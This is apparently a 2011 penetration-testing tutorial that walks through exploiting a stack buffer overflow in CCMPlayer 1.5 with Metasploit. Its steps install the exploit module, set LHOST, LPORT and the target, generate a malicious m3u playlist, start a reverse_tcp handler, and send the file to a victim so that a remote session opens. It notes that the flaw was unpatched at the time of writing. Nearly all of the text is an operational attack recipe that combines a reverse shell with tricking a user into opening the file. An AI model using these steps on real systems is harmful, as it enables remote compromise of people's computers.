Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Vulnerable Application : CCMPlayer 1.5
Exploit Credits : Rh0
This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening a m3u playlist with a long track name, a SEH exception record can be overwritten with parts of the controllable buffer. SEH execution is triggered after an invalid read of an injectible address, thus allowing arbitrary code execution. This module works on multiple Windows platforms including: Windows XP SP3, Windows Vista, and Windows 7.
1. Vulnerable application CCMPlayer 1.5 (view download link)
2. CCMPlayer 1.5 Exploit
Victim IP address : 192.168.8.91
Attacker IP address : 192.168.8.92
1. Download the vulnerable application and install it in your windows operating system and download the exploit above.
2. Open your terminal(CTRL + ALT + T) and put the exploit in the following folder
cp ccmplayer_m3u_bof.rb /pentest/exploits/framework/modules/exploits/windows/fileformat/
3. Open up your Metasploit console by typing msfconsole in your terminal and use the exploit you've just added before
4. The next step you can view the available switch that you can set it up manually by using show options command. Below I'm just configure the minimum options to make this exploit working.
Information :set filename great-songs.m3u --> create the name of the file set lhost 192.168.8.92 --> set up the attacker ip address set lport 443 --> attacker local port use to connect back when there's a victim set target 0 --> set target to CCMPlayer 1.5 exploit --> generate the malicious m3u file (the red box in pics above was the location of malicious file)
5. When you finish locating the malicious m3u file, you need to run a handler in attacker computer to handle the payload we've just create before(reverse_tcp)
6. After the scenario already set up, the next step we need to send the malicious file to victim computer and make sure he/she open it. Below was the picture when victim try to open the malicious m3u file.
7. After victim opened the malicious file, our handler will receive a new session connection with victim computer…
1. Until the day I wrote this tutorial (24 December 2011), there's still no update a.k.a zeroday…
Hope you enjoy it 🙂